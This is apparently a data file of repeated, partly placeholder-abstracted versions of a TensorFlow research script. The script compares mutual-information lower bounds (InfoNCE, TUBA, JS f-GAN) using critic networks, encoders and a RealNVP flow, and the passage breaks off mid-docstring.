"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. 
(2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n 
input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = 
lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 
2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if 
tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
